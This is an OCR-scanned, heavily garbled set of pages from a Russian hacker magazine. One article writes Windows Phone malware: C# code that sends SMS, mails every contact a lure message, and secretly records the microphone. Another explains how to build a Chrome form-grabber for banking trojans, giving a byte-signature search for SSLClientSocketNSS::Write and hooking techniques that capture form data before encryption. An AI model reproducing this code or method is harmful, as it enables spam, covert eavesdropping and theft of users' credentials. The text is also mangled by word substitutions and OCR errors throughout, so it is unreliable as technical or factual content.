Ка ж дое nрилож е ни е выnолняется на своем

nространстве- ко а м ере

0.

Пользователю заnр е щен перед из туn для фа й ло­

.NET Compactl , изо

те нциально! ни ко ак в рассуждении е ПО далеко не может надуть

0.

SmsComposeTa sk msgSMS=пеw SmsComposeTask(); msgSMS. Body="Наше зло-сообщение" ;

WINDOWS PHONE

ности своей мобильной ОС .

0.

0. 6.

оторванно ото дру г равно х nриложений , таким образом , для ни м ни ко в таком случае безграмотный имеет по от т у nа, к роме самого nрил ож ения.

03/158/2012

Приложения дозволительно у не без; танавливать только из

ichamberl .

Ка ж дое nрилож е ни е х ранит из вои исходняк

ХАКЕР

Oп N a vigatedTo(N avi g a tioпE ve пtArgs е)

Windows

Рhопе

Marketplace . SSL . Впроч е м ,

Данные nередают из автор этих строк после

было бы чудеса в решете , е сл равно бы было инач е.

0.

Разработчик м об но т истощить ко лас со

ProtectedData

lна х одящи й ся во nростран -

System .Security.Cryptograph yl,

0. WP 0 nоддерживаетсл е дующие алго­ ритмы шифрования : АЕS, HMACSHA1 , HMACSHA256, Rfc2898DeriveByte s, RSA, SHA1, SHA256 . 9. Встроенный браузер, мобильны й IE , н е nо­ зволяет устанавливатьдоnолнительные nлагины .

00. Приложения,

разработанные невыгодный на

Microsoft,

безграмотный м огутфун для циониров а ть на фоново м р язва да м е .

083


MALWARE msgSMS.To=""1928"" ; msgSMS. Show();

}

СПОСОБЫХРАНЕНИЯ

П оследняя коман безусловно листинга формирует да отправляет сообщение; остальной шифр во комме нтария х невыгодный нуждается.

МОБИЛЬНЫЙ СПАМ- ЗЛОБОДНЕВНАЯ ТЕМА : ]

Windows Phone nредоставляет nриложениям три способа раздельного хранения информации:

0.

Следующая оборона га , которую ты да я напишем, хорошенького понемножку считыва ть имейлы

Изолированное спецхран для того настроекзаnоминаеттекущее

положение nриложения nри nереходе изо одного режима его работы

на непохожий (исnользуется hаsh-таблица : параметр=значение) .

изо списка контактов владельца смартфона да распространять получи них <щен­

н ую» информацию:). В знак с предыдущей версии мобильной

0. Изолированное склад с целью файлов равным образом nапок.

оси, во WP 0.5 контактные причина хранятс аз многогрешный на удобочитаемом во иде

З.

Локальная БД на реляционных данных служит с целью хране­

во локально й БД . К ним относятся безвыгодный только лишь подворье телефонов

ния множества чинно уnорядоченных свойств приложения ,

равно адреса электронной почты , так да др уг ая исходны данные относительно контактах,

ко которым вnоследствии не возбраняется устремиться из nомощью заnроса

забитая пользователем , что-то около зачем эа ним не запрещается достаточно уже равным образом по­

сверху LINQ, воеже исключить и/или видоизменять эмпирика .

шпионить. Эта БД предназначена всего лишь с целью чтения , отчего тебе не удастся модифицирова ть сведения другими словами прирастить недавний контакт.

Пора заводить разработку. Создай новомодный WР-проект (об рати внимание , сколько операционная налаженность имеет версию 0.5, а SDK-

Таким образом, у разработчика в наличии просторный ассортимент средств ради хранения данных , невзирая нате неприбытие достуnа

ко файловой системе устройства.

версию 0.1) получи и распишись основе Silveгlight , перейди во обложка С#-кода да добавь в початие ссылку бери протяженность имен Micгosoft.Phone.UseгData, обесnечивающее работу из пользовательскими данными. Не забудь также примолвить указанное на прошлом разделе nространство имен

же хорошенького понемножку возвращен во переменной класса CoпtactsSeaгchEve ntAгgs .,

в целях работы не без; мылом. Второе, который должно сделать, - сие обнародовать

да вернется некто исключительно на событии SeaгchCompleted, обрабатыватель

глобальную переменную класса Contacts, чтоб вмещать посещение

которого желательно зарегистрировать на функции MainPage:

ко контактным данным юэера. Для инициализации nоиска автор вы­

зываем с функции MainPage функцию ln itSeaгch, которая на строчке

contacts.SeaгchAsync(Stгing. Empt y, FilteгKi nd. DisplayName, null)

contacts.SearchCompleted +=new EventHandler< ContactsSearchEventArgs >(contacts_SearchCompleted)

производит неодновременный разведка до контактным данным . У функции

SeaгchAsync три дружка метра: критерий поиска (если настоящий параметр

Теперь опишем сие событие:

пустой, ведь ищется всё); чета метр, по части которому проводится выбор-

ка ( не запрещается выслеживать до имени, имейлу, боец у телефону или — или просто указать None, коли параметр невыгодный важен, на правах на нашем случае); объект, в некоторый помещается произведение поиска, иначе говоря nul l. Р езульта т всё рав-

void contacts_SearchCompleted(object sender, ContactsSearchEventArgs е) { int max=e.Results.Count(); // ко ол-во конта ктов string adr; try { // нет слов уклонение падения nроги for ( int i=е ; i < max; i++) i f (e.Results.ElementAt(i).EmailAddresses !=null) { adr=e.Results.ElementAt(i). EmailAddresses.First() . EmailAddress ; // берем мыло i f (adr !=_ null && adr !="" ) 01 разве оно далеко не непропорционально нулю SendEmail(adr); // ерихонка мь~о : )

catch (Exception

ех)

{ }

} Из заключение видно, что такое? раньше да мы вместе с тобой берем точки соприкосновения контингент найденны х контакто в, дальше во цикле выбираем начальный e-mail-aдpec каждого кон­

такта (у него может бытовать неграмотный одно мыло) и, разве нынешний адресок никак не nустой , вызываем функцию SendEmail, которой п ередаем сысканный адрес. Это жуть простая функция:

void SendEmail(String adr) { EmailCompos!;Task email=new EmailComposeTask()_; email . То_=adr; email. Subject=" Holy mail" ; email. Bqdy="Down_load my prog" ; email. Show(); } Как завсегда , до мельчайших подробностей прокомментированный распечатка ищи сверху ди ске

(проект EmaiiSeпder). Интерфейс Overhear2

ХАКЕР

03/158/ 0012


Малварь к мобильных <<око шек »

ПОДСЛУШИВАТЕЛЬ

стакан относится ко пространству имен

В прошлом разделе у нас от тобой был бездумный расела бон, того

xna,

симпатия управляется со­

бытийным механизмом сего цикла:

дай напишем что-нибудь за еложнее да поинтереснее. Как должно

с заголовка раздела, следующая наша малварь короче хлопать ушами равным образом со­ хранять совершенно улавливаемые смартфоном звуки. Для ясности конспективно

DispatcherTimer dt ; new DispatcherTimer(); dt.Interval ; TimeSpan . FromМilliseconds( ЗЗ );

расскажу об алгоритме ее работы, что ваш покорнейший слуга его вижу. Итиль зумеется, автор сих строк

пишем нынешний образец чудовищно на исследовательских целя х!;]

Чтобы пользоваться способ возделывать происшествие таймера, про­

После запуска· наше приложениена мало-мальски секунд заключает

исходящее от установленный период времени, подписываемся

ларингофон равно записывает окружающие звуки во поток, по времени выключа­

возьми событие: dt.Тick

ет ларингофон равно записывает армия на обложка во изолированном хранили ­

команды dt.Staгtll запускаем таймер.

ще смартфона, в дальнейшем чего, наконец, загружает с сего хранилища

+; new EventHandler(dt_Тick). Затем со через

Второй регулятор выдержки времени нужен интересах того, дабы удалить микрофон,

обложка равно воспроизводит его. Результат я узнаём токмо задним числом

сэкономить целый короб во файле равным образом воссоздать его. Таким образом, для того

исполнения последовательности всех сих действий , потому исключая

инициализациивременного интервалатаймера нужендлительный

малвари ваш покорный слуга приготовил чтобы тебя употребление (Оvегhеаг2 , ищи бери дис­ ке], на котором каждая отдельная воздействие выполняется соответственно нажатию

простор между предметами (например,

кнопки, дабы твоя милость был способным подробней тралить весь сии операции.

конструктора инициализируем микрофон, вызывая самсписную

Если хочешь построить вариант дружно со мной из нуля, сгенерируй

новоявленный Silveгlight- цель ради

WP.

00 000 мс], nлюс должно задатьдругую функцию

во качестве обработчика события, всё остальное ведь но самое. В конце

Пер ейди во почин файла С#- стих

функцию SetupMicгophone. Сначала возлюбленная проверяет, с тем дефолтны й

стопка неграмотный был равен нулю. Если сие по мнению каким-то причинам безвыгодный так,

равным образом подключи следующие пространства имен:

т~делатьнечег~выхо квартал .

using using using using using

способ фиксировать аудио продолжительностью полсекунды.

Затем устанавливаем аудиобуфер микрофона, дай тебе нахватать

System.IO; Microsoft.Xna.Framework; Microsoft.Xna.Framework.Audio; System.Windows.Threading; System.IO.IsolatedStorage;

Заполняем нулями публикующий досель поток. После сего регистри­ руем событие, возникающее рядом заполнении буфера. Вызов функ­ ции WгiteWavHeadeг рассмотрим серия позже, временно спирт про нас

никак не жирно будет важен . Наконец, со через строчки micгophone.Staгtll включаем микрофончик нате заметка окружающих звуков. В последней

В первом с них находятся классы к работы вместе с потоками равным образом фай­

лами, нет слов втором- FгamewoгkDispatcheг (если коротко, обработ­

строчке функции устанавливаем точка громкости . Настала кортеж действие первого таймера , которое вызывается

чик циклических событий], на третьем, собственно, самовольно микрофон,

каждые

на четвертом -таймер ради генерации циклических событий (ниже

подле этом целое происходящие исключения игнорируются. С момен-

03

миллисекунды . В нем только лишь обновляе тся состояние,

рассмотрим, про что спирт нужен], а во пят ом - ресурсы в целях работы

та запуска программы равно накануне тех пор, доколь подходит запись, аргумент

со изолированным хранилищем. Дале е на механически сгенери­

гecoгdingStopped имеет нулевое значение. Когда истечет временной

рованном классе MaiпPage объявим глобальные переменные iсм.

диапазон второго таймера да его история полноте сгенерировано, каста

исходник]. П ервая безвыгодный представляет особого интереса, на ней прямо-таки

аргумент примет истинное значение. При заполнении аудиобуфера

содержится кличка файла пользу кого сохранения полученного звука равно его по­

микрофона (это происходит ориентировочно каждые 000 миллисекунд] вы­

следующего считывания. Во дальнейший переменной объявляем микро­

зывается происшествие micгophone_BuffeгReady.

фон, которому враз а присваиваем сила <<ПО умолчанию» на сегодняшнее минута совершенно смартфоны со ОС

Windows Phone только одним микрофоном, посему альтернатива мало значит :].

оснащаются

В нем документация извлекаются с аудиобуфера микрофона да записы­ ваются во поток. Е сли около этом аргумент гecoгdingStopped принима­ ет истинное значение, значит, фанера завершена, равным образом нам нельзя не

Затем объявляем переменную , для которой nривязывается nоток. В этом потоке сохраняются аудиоданные на изм сеанса

включить стакан равно спасти река данных во файле. Возможно, твоя милость задалея вопросом: благодаря тому автор неграмотный выключаем микро­

заnиси, под сбросом во хранили ще . Массив байтов (следующая

тон раскованно рядом генерации действие второго таймера, а от­

переменная] используется с целью пром ежуточного хранения данных.

кладываем вырубание впредь до следующего заполнения грудь данных?

Когда вн утре нний задница микрофона заполняется, эмпирика изо него

Это нужно про того, воеже данные, имеющиеся на буфере для моменту

скидываются во настоящий массив, да исключительно в рассуждении сего записываются на весь

возбуждения перипетии тика таймера, были сохранены . Если бы наш брат

электричество . Булевекая аргумент гecoгdingStopped указывает действие,

вмиг выключили микрофон, в таком случае данные, находящиеся во его буфере,

выполняемое на текущий момент, в таком случае есть, если бы возлюбленная равна нулю, согласен

были бы уничтожены.

заnись (если стопка до этих пор включен], на nротивном случае осущест­

Функция SaveFilei] (см. листинг], вызываемая в целях сохранения фай­ ла, без затей создает обложка на изолированном база равным образом записывает

вляется воспроизведение.

В конструкторе класса объявим пара таймера класса

во него вполне целый короб не без; начатки равным образом давно конца.

DispatcheгTimeг знак инициализируем их временные значения .

Первый регулятор выдержки времени нужен чтобы имитации игрового цикла

xna.

Так что

private void SaveFile() {

/ /сох оцарапать обложка

ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ В все в равной степени кто пространство времени может становиться явью

получай другое, бульон переводится на сонный политическое устройство

на движение жизненного цикла приложения не без; ним

одно приложение, да сие бог важно- случай во том,

ldoгmaпt), однако его текущее средства сохраняется,

происходит через двух до самого четырех событий: история

ась? сие прибавление lтеоретически) далеко не сможет

дабы подле последующем запуске вставка

Lauпchiпg во секунда запуска, Closiпg во миг

во фоне послать эсэмэску сверху оплачиваемый выпуск или — или

возобновило работу. Процесс захоронения

закрытия,

произвести оставшиеся злодеяния. Этотход позволяет

приложений

захоронении) равным образом Activating рядом восстановлении

доставать наилучшей производительности, да

tombstoniпg. Если работающему приложению

изо

безграмотный изводить запас батареи держи фоновые задачи. Когда

далеко не сколько угодно ресурсов, так ОС завершает (teгmiпate)

производится сбережение равно воскрешение

ламер переключается со одного приложения

спящие приложения во порядке их запуска. В общем,

состояния приложений, дозволительно культивировать .

ХАКЕР

03/158/ 0012

(active -> doгmaпt) получил наименование

Deactivating возле деактивации (при

tombstone. Все сии события, на которых в большинстве случаев

085


MALWARE using (IsolatedStorageFile isoStorage= IsolatedStorageFile . GetUserStoreForApplication()) { using (IsolatedStorageFileStream isoStream ~ isoStorage.CreateFile(FileName)) { isoStream . Write(stream . ToArray(), е, stream.ToArray().Length);

Однако кабы не потерять целый короб на таком виде, во каком некто безотлагательно есть,

в таком случае его малограмотный откроет ни одна проект пользу кого воспроизведения . Чтобы привести влажно й армия данны х для понятному на иду, никуда не денешься добавить заголовок . Таким образом, у нас получится wаv-файл. Е сли нужно получить обложка другого типа, так надо градом данны х нужно дополни­

тельно поизвращаться

Разработка малвари

Overhear

:1. Но равным образом чтоб произвести азбучная истина wаv -фа йл, нам

нуждаться узнавать границы полей заголовка. В своем благе швейцар­

ский фрикер Дамиан l goo.gl/ufeЗyl предлага ет замечательное решение, которое заключается на добавлении двух функций ! их код есть бери странице) . Не вижу смысла им безвыгодный воспользоваться! Функцию WriteWavHeader, которая создает начальные причина для заголовка, приходится затребовать во начале календарь lв нашем случае- на функ ­ ции SetupMicrophonel, а функцию UpdateWavHeade r, обновляющую

При использовании объекта изолированного хранилища некто откры­ вается пользу кого чтения всего только в дальнейшем проверки того, существует ли вообще файл указанного имени. Звук изо открытого файла воспроизводится с через объекта mediaSound. Воспроизведение начинается после привязки файлового потока для данному объекту равным образом установки позиции, с которой надлежит начить проигрывание, равно громкости звучания.

Кроме того, дозволительно отражать целый короб аудиоданных лично

заголовочные данные, которые зависят через размера записываемого

изо памяти. Для сего будет учредить мира звукового эффекта

потока,- во конце записи, преддверие сбросом данных во обложка !то лакомиться

со следующими параметрами: ультразвуковой наводнение во памяти, преобразован­

на функции microphone_BuffeгReady, со временем окончания записи, однако пизда

ный на скопление байтов, колебание звука !есть предопределенные значения)

вызовом SaveFilel. В результате на изолированном храни лищ е короче

равно сумма каналов звуковых данных !м оно сиречь стереоl. Затем не­

сохранен полновесный wаv-файл. Последне е действие, выполняемое

обходимо потребовать рецепт Play данного объекта:

на обработчике перипетии microphone_BufferReady !кроме обнуления переменной recordingStoppedl,- сие бис функции PlayFile для воспроизведения звука с сохраненного файла. Вот наравне выглядит эта функция:

private void PlayFile() . {. //воспроизвести сохра ненный файл using (var isf= IsolatedStorageFile.GetUserStoreForApplication()) i f (isf.FileExists(FileName)) { . using (var isoStream=isf.OpenFile(FileName, FileMode.Open, FileAccess.Read)) { mediaSound.Stop(); mediaSound.SetSource(isoStream); mediaSound.Position=System.TimeSpan.FromSeconds(e); mediaSound.Volume=20; mediaSound.Play();

sound=new SoundEffect(stream.ToArray(), microphone.SampleRate, AudioChannels.Mono); sound. Play(); Вот равно постоянно потенциал нашей узкий вари! Тем безвыгодный менее, имеются пла­ ны по мнению ее развитию : для примеру, потому как изо ОС Windows Phone нельзя отправлять переписка со вложениями, придется обливать файлы держи какой­ нибудь сервер. Но сим пишущий сии строки займемся во будущем!

ЗАКЛЮЧЕНИЕ В статье автор провели обозрение системы безопасности Windows Phone 0.5, рассмотрели возможные защитный да разработали собственную малварь.

WP- барином известная система, равно во будущем симпатия будеттолько набирать аудиторию. Так равно как порядок имеет мощные собственность к обе­ спечения безопасности, а приложения на ней устанавливаются исключительно

изо Marketplace Hub !где подлежат обязательной модерации), у малвари практически блистает своим отсутствием внутренние резервы nоnасть возьми телефон. В так но момент раз­ витие малвари далеко не овчинка выделки стоит бери месте, nоэтому будем сосредоточенно наблюдать

}

из-за дальнейшими событиями , а может быть, да рядом м ем на них участиеl :Х:

ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ WP 0 предоставляетвыполняемому приложе­

равным образом драйверы уровня ядра, следовательно,

выполняются драйвера пользовательского

нию изолированное пространство- камеру.

разработчики nрикладны х программ долж­

уровня .

Приложение, находящееся во этой камере,

ны отвиливать использования сего режима ,

невыгодный имеет доступа ко данным других приложе­

особенно разве они хотят разместить свое

дефолтный строй выполнения предуста­

ний. При этом существует четверик подобно камер:

приложениена

новленных программ , таких на правах

0. The Trusted Computing Base (ТСВ)- устои

потому как выполняющееся нате этом уровне

доверенного выполнения . На этом уровне выполненияприложениеснаивысшими

086

Windows Phone Marketplace,

приложениенепройдетпроверк~

0. The Elevated Rights Chamber (ERC)- каме­

0. The Standard Rights Chamber (SRC)MS Office Explorer 0 да т. д . 4. The Least Privileged Chamber (LPC)- уро­ MoЬile, lnteгпet

вень наименьших привилегий, дефолт­

привилегиями имеет путь ко во всем ресур­

ра повышенных прав . Здесь приложения

ный общественный порядок выполнения приложений

самоуправно смартфона, начиная фото- равным образом видео­

имеют проход ко во всем ресурсам, сверх того

далеко не ото

камеру, акселерометр равно кое-кто датчики.

стратегий безопасности, в таком случае кушать ко данным ,

предоставляются исключительно те ресурсы, кото­

В этом режиме выполняется косточка системы

устройствам равным образом датчикам. В этом режиме

рыезапрашиваются присутствие инсталляции.

Microsoft. В этой камере приложению

ХАКЕР

03 / 058/ 001 0


Preview КОДИНГ ФОРМГРАББЕРДЛЯGООGLЕСНRОМЕ

088

Перехватформ-это сугубо востре­ бованнаятехнологиявтрояна~таккак именно не без; ее nомощью осуществляется

ко р ажабольшейчасти личныхданных

J

nользователей. Формграббером для lnteгnet Ехрlогег да

Mozilla Fiгefox у а

ни души безвыгодный удивишь-такие решения

стары равно общеизвестны. А во граббинг для

Google Сhгоmе-это своего рода

эксклюзив, от которым твоя милость сможешь разо­

браться, nрочитав эту статью. Д ело-то, как оказывается, нехитрое-нужно

всего только выискать функцию, которая на качестве одного с nараметров nринимаетданные

комплекция внезашифрованном виде равным образом nо­ ставить получи и распишись нее хук.

КОДИНГ

UNIXOID

J)) И ЦЕЛОГО СИ МАЛО Приразработкехакерскихутилитчасто встречаются задачи, которые и думать нечего

решитьсиламиобычногоnреnроцессора Си. В экий ситуации выручит Python!

ФЕДОРИНОСЧАСТЬЕ Последние версии д истрибутива Fedoгa выделяются несколькими интересными равным образом

дажеинновационными изменениями. Но насколько они хороши?

SYN\ACK

01

В ПОИСКЕИНСАЙДЕРА Выявить да nредотвратить утечку кон­

фиденциальнойинформациисnособы DLР - системы. Мы решили nрове со ти не­

больший тест-драйвтаких решений.

ХАКЕР

03/158/201 0

01

ДОСТУЧАТЬСЯ ДО НЕБЕС Расширияемграницысоnрикосно на е н ия в е ба да обычного Linux-дecк т o n a, объеди н яя nривычную систе м у равно

облач н ые сервисы.

FERRUM

01

ИСПЫТАНИЕ НАГРУЗКОЙ Какие инструменты да n одходы могут nомочь Djаngо-nриложению выдержать баснословные нагрузки? Ответ в во­ nрос - на этом материале.

ОТ«ВИНТА>>! Го н яем полдюжины вовне ш нихжесткихдисков

во разных бе н чмарках . П ора опре д е­ лить, который изо них может похвас т а ть ся

максимальным аллегро дейс т вием.

087


КОДИНГ

Сергейка Сергеев [seseгegalagmail.гu, Ыotloгe.Ыogspot.coml

р

пользу кого

Google Chrome ИССЛЕДУЕМ ОТПРАВКУ ЗАШИФРОВАННЫХ ФОРМ И СПОСОБ ИХ ПЕРЕХВАТА В БРАУЗЕРЕ

OTGOOGLE

• qoo.qi/Cj4PI OllyDbg к

nлaгин

создания сигнатур

равным образом масок .

аоо .аl/гdдlо -то

но самое, исключительно

АЛЯ IDд .

• qoo.gl/ulqMb -интересная

линия в форуме , nосвящённая

перехвату форм в Chгome .

• qoo.ql/sZWwZ касательно прологе равным образом эnилоге .

Для генерации прологов равным образом эпилогов я использовал

функцию без модификатора

_ declspec( naked), рассматривал её в дизассемблере и копировал начало и конец.

Перехват форм- сие самый востребованная технология на банковских троянах, что-то около в духе не кто иной вместе с ее помощью осуществляется угон большей части личных

данных пользователей. Формграббером к lnteгnet

Ехрlогег равным образом

Mozilla

Fiгefox сейчас ни одной живой души отнюдь не удивишь- такие

решения стары равным образом общеизвестны . А вишь граббинг для того

Google

Chгome- сие непостоянно эксклюзив, со которым я

нонче равно разберемся .

088


Формграббер д ля

Google Chrome

~~----- -~ ~~~~~~-----

~~

Рис .

0. Сигнатурн ый

Н

n по части заявление на

Р равно с.

OllyDbg

0. Поис ко SSL- зa n poca

равно что-что сложного на перехвате нет, нужно только что обнаружить функ­

SRV*c:\code\symbols*http://msdl . microsoft.com/download/ symbols;SRV*c:\code\symbols* http://chromium- browsersymsrv.commondatastorage.googleapis.com

цию, которая во качестве одного с параметров принимает данные телосложение внеза ш ифрованном виде да снабдить

держи нее хук. В библиотекой

IE такая функция, HttpSendRequest, экспортируется wininet .dll, во Fiгefox сие назначение PR_Wгite изо библи­

Здесь c:\code\symbols- папка, гораздо складываются закачанные

отеки пspг4.dll, а что автор этих строк искал аналогичную функцию ради Хрома, сейчас расскажу.

отладочные символы.

0.

Открыть небольшую толику окон изо кадастр View. Рекомендую отворить окна Commaпd, Registeгs да DisassemЬiy.

ИССЛЕДОВАНИЕ С перехватом незашифрованных форм во

Chгome не имеется ника­

Google

ких проблем, будет сделать хук сверху стандартную экспорти­

0. 6. 7.

Запустить Chгome. Открыть каталог

File-7 Attach to а

Pгocess ...

Выбрать какой приглянется chгome.exe равно сделать все возможное ОК.

руемую функцию WSASeпd. Сделать сие баста легко, равно ма­ териала на интернете возьми эту тему предостаточно. П оэтому паче

С через команды <<х chгome*!*SSLCiientSocketNSS: : Wгite>>

быть в сборе получи и распишись поиске функции, которая принимает сведения

!которую надлежит внедрять на окне Commaпdl ваш покорнейший слуга нашёл функцию

форм во SS L-соеди н ении покамест д в рассуждении шиф р ова н ия .

SSLC i ientSocke t NSS::Wгite, а далее равным образом SS L CiientSocketWin::Wгite. П о­

Мои п оп ы тки сыскать подобную функцию со помощью закончились неудачей, оттого аз многогрешный начал рыть на

Google

OllyDbg и махом

наткнулся бери страницу от полным исходным кодом браузера

ставил сверху них брейки lbгeakpointsl равно зашёл на особый Gmаil-аккаунт. Программа прерывалась всего-навсего получи и распишись функции

SSLCiientSocketNSS

::Wгite.

lgoo .gi/8SgW2 , все же Chгome - опенсорсный проект). Висходниках дозволено поковыряться , указав на соответствующем поле сложение поиска, что такое? сыскивать автор хотим на файлах С++ . П ервый запрос, кто пришел м н е на голову,- сие

«ssl socket>>.

В процессе поиска в соответствии с э т ому запросу моя персона вмиг наткнулся для обложка

ssl_socket .h lgoo.gl/6cw0w l, только ни ложки интересного на нём безвыгодный на­

О nисани е фуй нк ции,

сверху йден н об й на равным образом от х од н ом для оде

int SSLClientSocketNSS: :Write( IOBuffer* buf, int buf_len, const CompletionCallback& cal l back

шел, зато во левой части экрана увидел бревно файлов от вкусными названиями. Меня интересовало всё , который имело во названии

·

ssl socket, а во особенности файлы ssl_clieпt_socket_nss . cc, ssl_ client_socket_openssl.cc равно ssl_clieпt_socket_wiп.cc. Я знал, ась?

передается зад от РОSТ-запросом. Л огично предположить, что-нибудь

во Fiгefox перехватывается цель PR_Wгite, равным образом решил пошакалить

во переменной из типом IOBuffeг:

да

Оставалось только лишь выяснить, каким образом этой функции

равно ее. В результате сверху первой а изо появившихся двух страниц оказался обложка

ssl_client_socket_nss.cc.

Саму функцию автор на нем что-то около

да далеко не нашёл, но ныне знал, из каких мест возлюбленная вызывается.

class NET_EXPORT IOBuffer : puЫic base: :RefCountedThreadSafe<IOBuffer>

Просмотрев листинг, ваш покорный слуга наткнулся нате функцию SSLCiientSocketWin::Wгite, чем-то напоминающую PR_Wгite. В дру­

puЫic :

гих фай л ах, п еречисленных выше, возьми шлись аналогичные функции:

IOBuffer(); explicit IOBuffer( int buffer_size); char * data() { return data_; } protected : friend class base: :RefCountedThreadSafe<IOBuffer>; explicit IOBuffer( char * data); virtual -IOBuffer(); char * data_; };

SSLCiientSocketOpenSSL: : Wгite равно SSLCiieпtSocketWin::Wгite. Следо­ вало их проверить.

Для сего требовался настройщик равным образом адреса функций. Я восполь­ зовался официальной инструкцией согласно настройке равно отладке

Google

Chгome, которая лежит соответственно адресу goo.gl/fwt1S . Е сли вкратце, так на отладки Хрома нужно произвести следую­ щее:

0. 2. 3.

Запустить WinDBG . Открыть список

File -7 Symbol File Path.

Вставить на появившееся окно следующую строку:

ХАКЕР 03/158/201 0

Так наравне архитектоника сложная да непонятно, какое на действительно-

089


КОДИНГ

EIP 0287SR4C chroNe_1.0287SR4C С 0 ES ае23 02Ьi t et FFFFFFFF! Р 0 CS eet В 02Ьi t et FFFFFFFF! ~ 0 SS е023 02Ьi t 0( FFFFFFFF!

0 0 S е

Т е о е о е

ST0 ST1

ST2

OS 0023 02Ь 0t FS е03В Э2Ьi t GS ее0е NULL

е 0FFFFFFFF 0 7FF~F000(

FFF!

емрtу

et<~Ot~ емрtу

SТЗ er>IPtY

ST4 er'loty

STS ST6 ST7

Рис.

емоtу емрtу емрtу

0. SSL-зanpoc найден

сти отстранение у данных, ми пришлось разыскивать директива получи сосредоточение

Здесь-то автор сих строк да будем программно сыскивать код нашей неэкспорти­

символов вручную. Для сего мы на сделано привычном

OllyDbg поставил брейк возьми функцию SSLCiientSocketNSS: : Wгite lсм. цицания 01, возле оста­

руемой функции.

новке взял главнейший параметр изо стека равным образом начал искать на нём

сигнатурный развертка . Сигнатурой функции !последовательностью байтов, за которой бросьте реализовываться поиск! выступят первые

любой DWORD iсм. падди 01. Выяснил ось, сколько беспристрастный DWORD !то поглощать 00Buffeг+81 представ­ ляет лицом курсор возьми конгломерат символов ichaг*l, включающий

Оптимальным способом к сего во данном случае аз многогрешный считаю

04

байт функции, они уникальны ради модуля chгome.dll равно однознач­

так указывают получай нашу цель.

НТТРS-запрос iсм. чалтык 01. Далее во процессе отладки мы обнаружил, что-нибудь заглавие

POST-

зanpoca равным образом его информация передаются функции дружище ради другом, во от­ дельных вызовах. Это нетрудно nонять, если бы определить символьный

брейк-данс получай функцию SSLCiientSocketNSS::Wгite lсм. рис вызывается цель да во буфере находится стих

01. Сначала «POST ... >>,а сле­

мчащий затребование уж включает исходняк формы. Мы сие обязательно учтем.

ПОИСК АДРЕСА Теперь не грех браться для разработке, ведь снедать ко написанию модуля , некоторый достаточно есть найденную раньше функцию.

дизас1-1 начаJJЫ!РЙ .част.и

nерехватt,~ваемой функции

chrome_lcзeeee!

net: : SSLClientSoc.ketNSS: : Wri te: 02875а4с 05 push еЬр 02875a4d ВЬ.ес mov еЬр, esp 02875a4f 01 push есх. 02875а50 03 push еЬх 02875а51 06 push esi 02875а52 07 push edi 02875а5) . ff7508 push dword ptr [ еЬр+ 0 ] 02875а56 Bbfl mov esi.ecx 02875а58 ЗЗdЬ xo r еЬх,еЬх

Тут пристало задуматься, в качестве кого раскопать ее приветствие программно, ведь она безвыгодный экспортируется, а значит, обычным GetPгocAddгess тогда

Скопируем первые байты функции равно преобразуем их на сосредоточение

байтов IBYTE*I, кой цель поиска сигнатуры принимает

отнюдь не быть . В процессе Хрома питаться неуд РЕ-модуля, которые потен­

на качестве параметра нераздельно со маской сигнатуры, хзндлом равным образом раз­

циально могут охватывать нашу функцию,- сие chгome.exe

мером модуля. Маска служит ради вычленения релятивных равным образом абсо­

да chгome.dll. Отладчик нам корректно сообщает, ась? домицилий

лютных адресов на сигнатуре, ибо что они могут видоизменяться близ

SSLCiieпtSocketNSS::Wгite наравне присест лежит на пределах

каждом запуске. Байты адресов помечаются знаком«?,,, осталь­

dll . Что

говорить, во ней по отношению ко всему находится большая порцион заключение браузера.

090

ные байты- наслышан <<Х>>.

ХАКЕР

03 / 058/ 001 0


Формграббер пользу кого Google Chгome

i f (DataCompare((BYTE *)(dwAddress+ i),pbMask,szMask)) return (DWORD)( dwAddress + i ); return

е;

Кто-то может сказать, ась? настоящий отсадка is f*cking unstaЫe. Однако прошло полгода, вер эта Хрома н ео дн ократно менялась, а сигна т у­

ра всё ещё ра ботает.

ПЕРЕХВАТ ОК , наш брат нашли а дре вместе с функции, теnерь её нужно nерехватить. Для этого nодойдёт известный сnлайсинг. Д ля те х, который на танке, сnлай­ си н г- сие технология nерехвата функции, основанный возьми модификации Рис .

0. Условный брейк-данс сверху SSLCiientSocketNSS::Write

ее кода. Самый nростой вид претворить в жизнь от nл айси нг- за­ менить, спервоначала сохранив, nервые

0 байт

nерехватывае­

муж функции получи «JMP твоя_функция » . Д ля вызова оригина льн ой

Вызов функции пои ска осуществляется следующим образом:

функции во этом из л учае нужно на осстано крутить э ти

0 байт с

бу фера ,

а затем вызова сызнова обновить возьми JM P. У сего метода поглощать будучи ­

char * Sign="\x55\xBB\xEC\x51\x53\x56\x57\xFF\x75\xeв \xBB\xFl\xЗЗ\xDB" ; // Сигнатура SSLClientSocketNSS :: Write

ственный недостаток. Дело на том, почто буде за восстановления начальной части оригинальной функции переключится на др угой поток, в таком случае дьявол сможе т поднять функцию, исключая свой хук.

char * Mask="xxxxxxxxxxxxxx" ; // маска DWORD SSLAdr=FindPattern(ChromeDLL, Chrome32Size, (BYTE*)Sign, Mask); /1 SSLAdr - код SSLClientSocketNSS: :Write

Есть да др угой приём сплайсинга - от приблизительно называемым «т рам­

пл ином>>. Как равным образом на предыдущем способе, на нем на зачин функции также встраивается

JMP нате хук, однако бери этом одинаковость заканчива­

ется . Для вызова оригинальной функ ц ии подле т аком сплайсинге её начальная делянка отнюдь не умереть и отнюдь не встать сста навливается . Этот манера безграмотный об ладает указанным недостатком.

При усишко тановке пере х хлопчатая бумага легко создается буферс пр авами

Сама функционирование выглядит так:

bool DataCompare( const ВУТЕ * pData, const ВУТЕ * bMask, const char * szMask

PAGE_EX ECUT E [устанавли на аются из через ViгtuaiPгotect], в кой копи р уются первые 0 [размер д жампа] другими словами больше байт из азбука функции . Размер джампа может побеждать 0 байт, та к как нам нужно ксернуть аsm - инструкции целиком, чтоб они

for ( ; * szMask; ++szMask, ++pData, ++bMask

смогли происходить на другом месте. Чт обы что касается пр еде точить , сколько в точности байтов калькировать равным образом идеже мера обычный инструк­

{ i f ( * szMask=='х' return false ;

&&

* pData !=* bMas k )

ции, во нормальных сплайсинг-движках обыкновенно используется д изассемб л е р длины . Так вот, во следствие грудь со скопированными инст р укциями д о­

return ( *s zMask )==NULL;

писывается JMP, задающий держи [адрес функции+ количество дл ан первых инструкций]. Таким образом, пользу кого вызова по отношению риг да н альной функции достаточно облечь в тело и кровь «JMP а др ес_буфера>> .

